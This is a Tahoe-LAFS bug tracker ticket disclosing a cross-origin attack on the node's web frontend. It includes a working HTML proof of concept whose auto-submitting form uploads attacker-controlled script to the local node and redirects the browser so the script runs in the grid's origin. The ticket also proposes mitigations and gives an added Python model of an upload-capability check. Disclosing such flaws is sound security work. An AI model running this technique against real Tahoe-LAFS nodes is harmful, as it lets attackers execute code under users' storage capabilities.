Opened at 2012-11-15T02:47:10Z
Last modified at 2013-09-14T17:41:18Z
#1859 new defect
Proof-of-concept attack: Upload and execute attacker controlled js from any domain. — at Version 2
| Reported by: | nejucomo | Owned by: | davidsarah |
|---|---|---|---|
| Priority: | major | Milestone: | undecided |
| Component: | code-frontend-web | Version: | 1.9.2 |
| Keywords: | security javascript same-origin capleak websec | Cc: | frederik.braun+tahoe@… |
| Launchpad Bug: | | | |
Description (last modified by nejucomo)
Proof of Concept Attack
The following proof of concept shows how an HTML file loaded from any domain into (some) browsers with JavaScript enabled can inject an attacker controlled script into a grid, and *then* cause the user to execute that script in the domain of the grid:

```html
<html>
  <head>
    <script>
      // The injected file: a page whose only job is to show the origin it runs in.
      var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY ATTACKER CODE IN MAI DOMAIN " + document.domain + "?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';

      window.onload = function () {
        var payload_input = document.getElementById('payload_input');
        payload_input.value = PAYLOAD;
        var the_form = document.getElementById('the_form');
        the_form.submit();
      }
    </script>
  </head>
  <body id="body">
    <p> demo attack: </p>
    <p>
      This page attempts to inject an attacker controlled script into a
      <a href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which
      domain this file is loaded from.
    </p>
    <!-- Cross-origin form POST to the local node's upload endpoint; when_done
         redirects the browser to the freshly uploaded file under the grid's origin. -->
    <form id="the_form" method="POST"
          action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
          enctype="multipart/form-data">
      <input id="payload_input" type="text" name="file"></input>
    </form>
  </body>
</html>
```
Mitigations:
There are several moving parts at work here. The when_done parameter with uri substitution was very convenient.
I think an upload capability would be the most consistent and thorough solution. Removing bits and pieces which may otherwise be useful, like when_done, feels like a piecemeal defense.
Requiring CSRF tokens may be more comprehensive, but also doesn't sit well with the rest of the capability model. (A CSRF token would be a bit like a "make a this kind of http request" temporary capability.)
Related Tickets:
- #615 is about illicitly gaining victim capabilities; whereas this ticket is about bootstrapping an attack and/or abusing ambient authority.
- #1215 is about adding CORS support and how that may create a vulnerability; this script demonstrates that, even without CORS support, similar vulnerabilities already exist.
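An added example, not from the ticket and not Tahoe-LAFS code: a Python model of an upload handler guarded by the "upload capability" proposed in the Mitigations section (a per-form CSRF token would be checked the same way). The names `mint_upload_cap`, `authorize_upload`, `Rejected` and the `upload-cap` form field are hypothetical; the request URL is the one the proof-of-concept form posts to. The check runs before any `when_done` substitution, so the cross-origin form, which cannot know the cap, is refused.

```python
import hmac
import secrets
from urllib.parse import urlparse, parse_qs


class Rejected(Exception):
    """Raised when an upload request lacks a valid upload capability."""


def mint_upload_cap():
    # Hypothetical: an unguessable secret the node embeds only in pages it
    # served itself. A page loaded from another origin cannot read it.
    return secrets.token_urlsafe(32)


def authorize_upload(url, form, valid_caps):
    """Constructed model of an upload handler, not Tahoe-LAFS code.

    `url` is the request URL, `form` the decoded multipart fields and
    `valid_caps` the caps this node has issued. Returns the when_done
    target the handler may redirect to after the upload, or raises Rejected.
    """
    parsed = urlparse(url)
    query = parse_qs(parsed.query)
    if parsed.path != "/uri" or query.get("t") != ["upload"]:
        raise Rejected("not an upload request")
    presented = form.get("upload-cap", "")
    # Constant-time comparison so a wrong guess leaks nothing about the cap.
    if not any(hmac.compare_digest(presented.encode(), cap.encode())
               for cap in valid_caps):
        raise Rejected("missing or invalid upload capability")
    # Only an authorized upload ever reaches the %(uri)s substitution.
    return query.get("when_done", ["/"])[0]


# Constructed request mirroring the proof-of-concept form above.
POC_URL = ("http://127.0.0.1:3456/uri?t=upload"
           "&when_done=/uri/%25(uri)s?filename=payload.html")


def poc_is_rejected(valid_caps):
    """True when the cross-origin PoC POST (no cap in the form) is refused."""
    try:
        authorize_upload(POC_URL, {"file": "<html>...</html>"}, valid_caps)
    except Rejected:
        return True
    return False
```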
Change History (2)
comment:1 Changed at 2012-11-15T02:50:25Z by davidsarah
- Component changed from unknown to code-frontend-web
- Keywords security javascript same-origin capleak added
- Priority changed from normal to major
comment:2 Changed at 2012-11-15T02:55:43Z by nejucomo
- Description modified (diff)